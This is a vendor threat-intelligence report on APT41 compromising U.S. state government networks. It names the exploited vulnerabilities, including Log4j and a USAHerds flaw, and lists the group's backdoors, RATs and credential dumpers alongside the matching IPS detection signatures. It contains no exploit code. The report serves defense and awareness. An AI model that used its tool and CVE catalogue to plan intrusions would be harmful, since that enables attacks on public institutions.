Threat Signal Report

APT41 Compromised Six U.S. State Government Networks

description-logo Description

FortiGuard Labs is aware of a report that threat actor APT41 compromised at least six networks belonging to U.S. state governments between May 2021 and February 2022. To gain a foothold into the victim's network, the threat actor used a number of different attack vectors: exploiting vulnerable Internet facing web applications and directory traversal vulnerabilities, performing SQL injection, and conducting de-serialization attacks. The intent of APT41 appears to be reconnaissance, though how the stolen information is to be used has not yet been determined.

Why is this Significant?

This is significant because at least six U.S. state government systems were broken into and data exfiltration was performed by APT41 as recent as February 2022 In addition, a zero-day vulnerability in the USAHerds application (CVE-2021-44207) as well as Log4j (CVE-2021-44228), among others, were exploited in the attacks

What's the Detail of the Attack?

APT41 performed several different ways to break into the targeted networks.

In one case, the group exploited a SQL injection vulnerability in a Internet-facing web application. In another case, a then previously unknown vulnerability (CVE-2021-44207) in USAHerds, which is a web application used by agriculture officials to manage animal disease control and prevention, livestock identification and movement. Also, APT41 reportedly started to exploit the infamous Log4j vulnerability (CVE-2021-44228) within hours of Proof-of-Concept (PoC) code becoming available. Patches for both vulnerabilities are available.

Once successful in breaking into the victim's network, the threat actor performed reconnaissance and credential harvesting activities.

What is APT41?

APT41 is a threat actor who has been active since at least 2012. Also known as TA415, Double Dragon, Barium, GREF and WickedPanda, the group reportedly performs Chinese state-sponsored espionage activities. APT41 targets organizations in multiple countries across a wide range of industries, such as telecommunications, industrial and engineering and think tanks. In 2020, five alleged members of the group were charged by the U.S. Justice Department for hacking more than 100 companies in the United States.

What are the Tools Used by APT41?

APT41 is known to use the following tools:

ASPXSpy - web shell backdoor

BITSAdmin - PowerShell cmdlets for creating and managing file transfers.

BLACKCOFFEE - backdoor that disguise its communications as benign traffic to legitimate websites

certutil - command-line utility tool used for manipulating certification authority (CA) data and components.

China Chopper - web shell backdoor that allows attacker to have remote access to an enterprise network

Cobalt Strike - a commercial penetration testing tool, which allows users to perform a wide range of activities

Derusbi - DLL backdoor

Empire - PowerShell post-exploitation agent, which provides a wide range of attack activities to users

gh0st RAT - Remote Access Trojan (RAT)

MESSAGETAP - data mining malware

Mimikatz - open-source credential dumper

njRAT - Remote Access Trojan (RAT)

PlugX - Remote Access Trojan (RAT)

PowerSploit - open-source, offensive security framework which allows users to perform a wide range of activities

ROCKBOOT - Bootkit

ShadowPad - backdoor

Winnti for Linux - Remote Access Trojan (RAT) for Linux

ZxShell - Remote Access Trojan (RAT)

Badpotato - open-source tool that allows elevate user rights towards System rights

DustPan - shellcode loader. aka StealthVector

DEADEYE - downloader

LOWKEY - backdoor

Keyplug - backdoor

What are Other Vulnerabilities Known to be Exploited by APT41?

APT41 exploited the following, but not restricted to, these vulnerabilities in the past:

CVE-2020-10189 (ManageEngine Desktop Central remote code execution vulnerability)

CVE-2019-19781 (Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance)

CVE-2019-3396 (Atlassian Confluence Widget Connector Macro Velocity Template Injection)

CVE-2017-11882 (Microsoft Office Memory Corruption Vulnerability)

CVE-2017-0199 (Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows)

CVE-2015-1641 (Microsoft Office Memory Corruption Vulnerability)

CVE-2012-0158 (MSCOMCTL.OCX RCE Vulnerability)

Are Patches Available for those Vulnerabilities?

Yes, patches are available for the vulnerabilities.

What is the Status of Coverage?

FortiGuard Labs has the following AV signature in place for this issue as:


FortiGuard Labs provide the following IPS coverage against vulnerabilities exploited by APT41:

Apache.Log4j.Error.Log.Remote.Code.Execution (CVE-2021-4104 CVE-2021-45046 CVE-2021-44228)

ZOHO.ManageEngine.DC.getChartImage.Remote.Code.Execution (CVE-2020-10189)

Citrix.Application.Delivery.Controller.VPNs.Directory.Traversal (CVE-2019-19781)

Confluence.Widget.Connector.macro.Path.Traversal (CVE-2019-3396)

MS.Office.EQNEDT32.EXE.Equation.Parsing.Memory.Corruption (CVE-2017-11882 CVE-2018-0798 CVE-2018-0802)

MS.Office.RTF.File.OLE.autolink.Code.Execution (CVE-2017-0199 CVE-2017-8570)

MS.Office.RTF.Array.Out.of.bounds.Memory.Corruption (CVE-2015-1641)

MS.Windows.MSCOMCTL.ActiveX.Control.Remote.Code.Execution (CVE-2012-0158)

MS.Windows.MSCOMCTL.ActiveX.Control.Code.Execution (CVE-2012-0158)

All network IOCs are blocked by the WebFiltering client.


Traffic Light Protocol

Color When Should it Be used? How may it be shared?


Not for disclosure, restricted to participants only.
Sources may use TLP:RED when information cannot be effectively acted upon by additional parties, and could lead to impacts on a party's privacy, reputation, or operations if misused. Recipients may not share TLP:RED information with any parties outside of the specific exchange, meeting, or conversation in which it was originally disclosed. In the context of a meeting, for example, TLP:RED information is limited to those present at the meeting. In most circumstances, TLP:RED should be exchanged verbally or in person.


Limited disclosure, restricted to participants’ organizations.
Sources may use TLP:AMBER when information requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Recipients may only share TLP:AMBER information with members of their own organization, and with clients or customers who need to know the information to protect themselves or prevent further harm. Sources are at liberty to specify additional intended limits of the sharing: these must be adhered to.


Limited disclosure, restricted to the community.
Sources may use TLP:GREEN when information is useful for the awareness of all participating organizations as well as with peers within the broader community or sector. Recipients may share TLP:GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels. Information in this category can be circulated widely within a particular community. TLP:GREEN information may not be released outside of the community.


Disclosure is not limited.
Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction.